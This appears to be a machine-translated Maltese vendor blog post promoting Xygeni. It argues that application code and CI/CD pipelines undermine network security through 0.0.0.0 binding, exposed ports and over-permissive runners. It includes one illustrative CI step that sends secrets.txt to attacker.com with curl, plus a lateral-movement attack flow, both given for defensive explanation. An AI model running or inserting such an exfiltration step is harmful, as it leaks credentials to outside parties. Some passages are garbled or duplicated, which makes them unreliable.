L-infrastruttura tan-netwerk ħafna drabi tiġi trattata bħala ħsieb sekondarju: “Aħna fil-cloud, għandna Kubernetes, hemm firewall x'imkien.” Iżda din il-mentalità tista' ssir perikoluża malajr, speċjalment meta l-applikazzjoni nnifisha ssir il-ħolqa dgħajfa.
Il-Punt Agħma Bejn il-Kodiċi u l-Infrastruttura tan-Netwerk
Ir-responsabbiltà għas-sigurtà ħafna drabi tkun allinjata ħażin. L-iżviluppaturi jiffokaw fuq il-karatteristiċi tat-tbaħħir; huma jassumu li t-tim tal-infrastruttura għandu s-sigurtà koperta. Sadanittant, it-timijiet tal-infrastruttura jaħsbu li l-applikazzjoni hija msaħħa bid-disinn. Din id-diżkonnessjoni toħloq punt dgħajjef, wieħed li l-attakkanti jisfruttaw malajr.
Eżempju tad-dinja reali: A CI/CD pipeline jikkonfigura ħażin ambjent ta' stagingServizz intern, maħsub biex ikun iżolat, jitħalla miftuħ għan-netwerk. L-applikazzjoni tiġi skjerata b'rabta ta' port miftuħ u mingħajr restrizzjonijiet fuq il-ħruġ. Ħadd ma jiskennja l-ambjent għal servizzi esposti qabel ir-rilaxx. Din mhijiex kwistjoni teoretika; huwa falliment prattiku tad-disinn bażiku ta' netwerk sigur.
X'falla:
- L-ebda kontroll tal-ħruġ: Ladarba s-servizz kien attiv, seta' jitkellem ma' kwalunkwe ħaġa.
- L-ebda sken tal-espożizzjoni fl-istadjar: Il-port miftuħ ma nnotax.
Dan juri għaliex l-infrastruttura tan-netwerk waħedha mhijiex biżżejjed. L-applikazzjoni u pipeline irid jinfurza wkoll il-konfini tas-sigurtà.
X'inhi s-sigurtà tan-netwerk f'dan il-każ? Mhijiex biss regola tal-firewall jew subnet privata. Hija l-fehim ta' kif il-kodiċi tiegħek iġib ruħu f'ambjenti ta' runtime, l-iskennjar għal esponimenti qabel l-iskjerament, u l-infurzar ta' mġiba stretta tan-netwerk waqt il-bini.
Hawnhekk jidħol eżattament l-AppSec konxju min-netwerk. Ma jieqafx hemm skennjar tal-kodiċi tas-sors. Iħares lejn kif il-kodiċi, l-infrastruttura, u CI/CD jintersekaw biex juru r-riskji tan-netwerk tad-dinja reali.
Il-Paradoss tad-DevSecOps: “Imma Għandna Firewalls” Mhijiex Sigurtà tan-Netwerk
Inti wara VPC. Hemm regola tal-firewall. Il-kontenitur jinsab fuq subnet privat. Imma xejn minn dan ma jimporta meta l-app tesponi interfaces sensittivi.
Eżempji:
- Bucket S3 huwa kkonfigurat ħażin bħala pubbliku, iżda teknikament "wara" netwerk privat.
- API interna esposta permezz ta' ingress ħażin fuq Kubernetes.
L-assunzjoni li l-infrastruttura tan-netwerk tipproteġi kontra żbalji fil-livell tal-app hija skaduta. Id-disinn sigur tan-netwerk jaħdem biss meta l-kodiċi tal-app jirrispetta l-konfini.
Meta l-Kodiċi tal-App Idgħajjef id-Disinn Sikur tan-Netwerk
Xi wħud mill-akbar toqob fis-sigurtà jibdew bħala żbalji żgħar fil-kodiċi tal-app:
Ir-rabta ma' 0.0.0.0: Dan jesponi servizzi fuq l-interfaċċji kollha, anke f'kontejners interni biss. Jista' jkun tajjeb fl-iżvilupp, imma jekk dan jasal għall-produzzjoni, jibdel servizz privat f'wieħed pubbliku mingħajr twissija.

🔒 Alternattiva sigura:
# Secure example ports: - containerPort: 8080 hostPort: 8080 hostIP: 127.0.0.1- Pakketti ta' partijiet terzi li jniedu servers HTTP awtomatikament. Dawn spiss jiżdiedu għall-konvenjenza u l-funzjonalità, iżda jiftħu wiċċ għal aċċess mhux intenzjonat.
- Tokens hardcoded aċċessibbli permezz ta' rotot interni. Jekk attakkant jilħaq servizz intern wieħed, jista' jiġbed tokens u jaċċessa oħrajn.
steps: - name: Exfiltrate secrets run: curl -d @secrets.txt https://attacker.comDawn mhumiex każijiet estremi. Jiġru fir-realtà. pipelines, f'ambjenti reali. L-infrastruttura tan-netwerk mhux se ssalvak minn defaults mhux siguri fil-kodiċi tiegħek.
CI/CD Pipelines: Theddida Moħbija għall-Infrastruttura tan-Netwerk
Il-bini tiegħek pipeline jista' jkun l-aktar parti privileġġjata tal-istack tiegħek, u l-inqas sigura. L-attakkanti jimmiraw lejn CI/CD ambjenti mhux biss biex ifixklu l-bini, iżda biex jidħlu aktar fil-fond fl-infrastruttura tiegħek.
Fluss tal-attakk:
→ Ikkomprometti r-runner tas-CI jew l-Azzjoni tal-GitHub.
→ Qabbad ma' servizzi interni permezz ta' mogħdijiet miftuħa tan-netwerk.
→ Uża mill-ġdid it-tokens maħżuna jew hardcoded.
→ Skennja l-firxiet tal-IP interni biex tiskopri servizzi ħajjin.
→ Mexxi lateralment biex taċċessa servizzi jew databases kritiċi.
Dan il-moviment ħafna drabi jkun possibbli permezz ta’:
- Runners b'permessi eċċessivi li jippermettu moviment laterali.
- Użu mill-ġdid tal-kredenzjali bejn impjiegi jew proġetti.
- Ħruġ mhux ristrett li jippermetti li x-xogħlijiet kompromessi jikkomunikaw ma' kwalunkwe host intern.
Is-soluzzjoni? Iżolament tax-xogħol, aċċess għan-netwerk b'fiduċja żero, permessi minimi għar-runners, u politiki stretti ta' egress. Mingħajr dan, id-disinn sigur tan-netwerk huwa mminat mill-għodod ta' awtomazzjoni tiegħek.
Is-soluzzjoni? Iżolament tax-xogħol, aċċess għan-netwerk b'żero fiduċja, u politiki stretti ta' ħruġ fir-runners.
Għaddas CI/CD PipelineVulnerabilitajiet
Tiegħek CI/CD pipeline jista' jkun l-iktar ħolqa dgħajfa fil-katina tas-sigurtà tiegħek, u l-attakkanti jafuh. Skopri kif Poisoned Pipeline L-Eżekuzzjoni (PPE) tibdel l-awtomazzjoni affidabbli f'bitħa tal-hackers, u x'tista' tagħmel biex teħles minnhom!
Servizzi Miftuħa, Portijiet Esposti, u r-Riskji għas-Sigurtà tan-Netwerk
Il-kontejners jintbagħtu malajr, iżda ħafna drabi jintbagħtu b'mod mhux sigur:
- Redis qed jaħdem fuq il-portijiet default.
- Il-proxies interni baqgħu jisimgħu fuq 8080.
- Pakketti li jintroduċu semmiegħa mingħajr intenzjoni.
Disinn ta' netwerk tajjeb u sigur jassumi li dawn l-affarijiet iseħħu. Jimblokkahom awtomatikament, javża meta jidhru, u jinkludi l-validazzjoni tal-port espost bħala parti mis-CI.
L-Integrazzjoni tad-Disinn ta' Netwerk Sikur fil-Flussi tax-Xogħol tal-Iżvilupp
AppSec m'għadhiex biss analiżi statika tal-kodiċi. Biex taqbad riskju reali, trid jikkombinaw SAST/SCA bl-iskennjar tan-netwerk u l-validazzjoni tal-espożizzjoni.
Fluss Prattiku: Ibni → Skennjar Statiku → Skennjar tal-Infrastruttura → Ivvalida l-Portijiet Esposti → Inforza l-Politiki
Eżempju: Uża r-regoli tal-Azzjonijiet ta' GitHub biex tfalli l-bini fejn ikunu esposti portijiet mhux meħtieġa.
jobs: check-open-ports: runs-on: ubuntu-latest steps: - name: Run container run: docker run -d -p 8080:8080 my-app - name: Scan for exposed ports run: | if docker port $(docker ps -q) | grep -q 8080; then echo "Unnecessary port exposed. Failing build."; exit 1; fi Din ir-regola sempliċi tinforza l-iġjene tal-espożizzjoni billi tintegra skennjar tal-port fil-proċess tas-CI.
Rakkomandata L-aħjar prattika tad-DevSecOps: Għaqqad SAST biex jinstabu vulnerabbiltajiet fil-livell tal-kodiċi permezz ta' skens tal-infrastruttura li jaqbdu konfigurazzjonijiet ħżiena. Dan l-approċċ b'żewġ saffi jipprovdi l-viżibilità meħtieġa għad-disinn modern ta' netwerk sigur.
Dan huwa DevSecOps bis-snien. Huwa kif is-sigurtà tan-netwerk issir parti mill-ħajja attwali tiegħek. pipeline.
mill Guardrails għall-Arkitettura: Il-Bini ta' Infrastruttura ta' Netwerk Sikura
Ibda infurza defaults siguri fl-ambjent tal-iżvilupp, mhux biss fil-produzzjoni. Guardrails huma bidu tajjeb, iżda l-kontrolli fil-livell tal-arkitettura jagħmlu s-sigurtà sostenibbli.
Passi konkreti:
- Blokk 0.0.0.0 rbit ma' web tad-dħul li qed jinbidelhooks f'Kubernetes. Dan jipprevjeni l-espożizzjoni mhux sigura tas-servizz qabel ma sseħħ.
- Ċaħda t-traffiku tal-ħruġ mill-kontenituri tal-bini awtomatikament biex tevita fluss ta' dejta mhux awtorizzat.
- użu Gwardjan tal-OPA biex jinfurzaw politiki bħas-segmentazzjoni tan-netwerk, il-whitelisting tas-servizzi, jew annotazzjonijiet obbligatorji tad-dħul.
Introduċi l-politika bħala kodiċi bħala strateġija li tista' terġa' tintuża u kkontrollata mill-verżjoni. Billi jikkodifikaw ir-regoli (eż., ċaħdu s-servizzi kollha mingħajr tikketti tan-networkPolicy), it-timijiet jistgħu japplikaw politiki konsistenti u speċifiċi għall-ambjent fl-iżvilupp, l-istadjar, u l-produzzjoni.
Il-politika bħala kodiċi mhijiex biss skalabbli, hija verifikabbli, portabbli, u tintegra direttament ma' CI/CD u flussi tax-xogħol tal-infrastruttura bħala kodiċi. Dak hu li jagħmilha essenzjali għall-infurzar tas-sigurtà tan-netwerk tul iċ-ċiklu sħiħ tal-ħajja.
Infrastruttura tan-Netwerk Tajba Ma Tistax Issalva Kodiċi Ħażin tal-Applikazzjoni
Il-firewall tiegħek mhux se jwaqqaf server Node.js li jesponi rotta ta' debug. Il-VPC tiegħek mhux se jwaqqaf pakkett li jibda proxy intern. Jekk l-app tesponih, in-netwerk jippermettih.
Dik hija l-verità fundamentali: id-disinn ta' netwerk sigur ifalli meta l-kodiċi tal-app jikser ir-regoli.
X'inhi s-Sigurtà tan-Netwerk Mingħajr Dixxiplina tal-Kodiċi?
Hija wegħda falza. Is-sigurtà tan-netwerk taħdem biss meta l-applikazzjoni, l- pipeline, u l-infrastruttura kollha jiġbdu fl-istess direzzjoni. Madankollu, ta’ spiss, il-prattiki tas-sigurtà jiffokaw fuq it-truf, mhux fuq l-intern.
Xogħlijiet ta' CI porużi jistgħu jagħtu mingħajr ma jintebħu bażi għan-netwerk lill-attakkanti, jibnu runners b'permessi eċċessivi jew mingħajr restrizzjonijiet fuq il-ħruġ u jaġixxu bħala backdoors.
Defaults mhux siguri f'pakketti open source, servizzi li jorbtu mal-interfaċċji kollha, servers HTTP integrati, jew proxies interni mhux verifikati, idgħajfu d-disinn tan-netwerk sigur tiegħek fis-skiet u malajr.
Is-suppożizzjonijiet legati huma daqstant perikolużi. L-idea li xi ħaġa hija "interna" jew "privata" f'arkitettura cloud-native hija qarrieqa. F'ambjenti moderni, "intern" ħafna drabi jfisser "aċċessibbli jekk taf l-IP."
Mingħajr limiti stretti u skennjar proattiv, żbalji żgħar jinfirxu 'l barra:
- Interfaċċja ta' debug fid-dev tasal għall-istaging.
- Port ta' monitoraġġ huwa espost permezz ta' dħul ikkonfigurat ħażin.
- Għodda interna hija miftuħa għad-dinja għax ħadd ma vverifika r-rabtiet awtomatiċi.
X'inhi s-sigurtà tan-netwerk jekk tista' tiġi evitata minn dipendenza ta' package.json?
Disinn ta' netwerk sigur veru jibda fil-kodiċi u jibqa' għaddej matul il- pipelineId-dixxiplina mhijiex fakultattiva; hija essenzjali biex l-istack kollu jkun difendibbli.
Kif Xygeni Jgħin biex Tiżgura l-Infrastruttura tan-Netwerk Permezz tal-AppSec
Xygeni iġib konxju tan-netwerk AppSec direttament f'tiegħek CI/CD pipelines, jidentifika mġiba riskjuża hekk kif isseħħ u jinforza politiki preventivi awtomatikament. Ma jiddependix biss fuq l-iskennjar tal-kodiċi; josserva l-attività reali tal-bini biex jaqbad dak li l-għodod statiċi jitilfu.
X'jagħmel Xygeni:
- Jidentifika r-rabtiet 0.0.0.0 waqt il-bini: Jekk servizz jorbot mal-interfejsijiet kollha, Xygeni jindika l-kwistjoni u jimblokka l-għaqda. Iqajjem twissija kuntestwali bil-post tal-fajl, l-isem tas-servizz, u gwida għar-rimedjazzjoni.
- Jidentifika l-portijiet interni esposti awtomatikament: Anke jekk is-servizzi mhumiex maħsuba biex ikunu pubbliċi, Xygeni janalizza Dockerfiles u konfigurazzjonijiet ta' runtime biex jidentifika portijiet miftuħa li għandhom jiġu mblukkati.
- Iwissi dwar impjiegi permissivi żżejjed: Xygeni jiskennja l-konfigurazzjoni tas-CI tiegħek għal runners b'permessi żejda, aċċess wiesa' għan-netwerk, u tokens użati mill-ġdid bejn xogħlijiet. Jikkorrelata dan mal-esponiment attwali tas-servizz biex jipprijoritizza r-riskju.
B'dawn il-kapaċitajiet, Xygeni tinforza disinn ta' netwerk sigur permezz tal-awtomazzjoni, billi tipprovdi lit-timijiet feedback bikri u azzjonabbli matul il-proċess ta' żvilupp, qabel ma l-artefatti mhux siguri jilħqu l-produzzjoni.
Ħsieb Finali: Jibda bil-Kodiċi, Mhux bil-Firewalls
Ma tistax tiffoka fuq is-sigurtà tan-netwerk fl-aħħar tal- pipeline u stenna li żżomm. Is-sigurtà vera, reali, reżiljenti, sigurtà full-stack, tibda mill-mument li jinkiteb il-kodiċi u tkompli permezz tal-bini, it-test, u l-iskjerament.
Kull saff huwa importanti:
- Jekk il-kodiċi jesponi l-interfejsijiet awtomatikament, in-netwerk diġà huwa kompromess.
- Jekk il-proċess tal-bini ma jivvalidax il-portijiet miftuħa, l-espożizzjonijiet jiżolqu.
- Jekk il- pipeline jippermetti xogħlijiet b'permessi żejda, il-perimetru jsir irrilevanti.
F'dinja ta' skjerament kontinwu, iterazzjoni veloċi, u dipendenza qawwija fuq open source, li wieħed jassumi li n-netwerk se jwaħħal in-nuqqasijiet mhux siguri hija illużjoni perikoluża. "Is-sigurtà tan-netwerk ma tibdiex bil-firewalls. Tibda fil-kodiċi tiegħek, fil-bini tiegħek, u fil-proċessi tiegħek." pipeline".
Dan ifisser li l-AppSec konxja min-netwerk tiġi ttrattata bħala funzjoni ewlenija tal-iżvilupp. Dan ifisser li l-kontrolli tas-sigurtà jiġu integrati kmieni u li d-disinn tan-netwerk ikun infurzat bħala parti minn kif it-timijiet jibagħtu l-kodiċi. L-ebda shortcuts. L-ebda suppożizzjonijiet. Biss dixxiplina, viżibilità, u awtomazzjoni, minn tarf sa tarf.
Ma tistax tisforza s-sigurtà tan-netwerk. Trid tkun parti minn kif tikteb il-kodiċi, tibni s-softwer, u tużah. Agħmilha konxja min-netwerk. Agħmilha sigura awtomatikament. U tieqaf tassumi li n-netwerk se jkopri għal kompiti ħżiena.cisjoni fil-kodiċi.






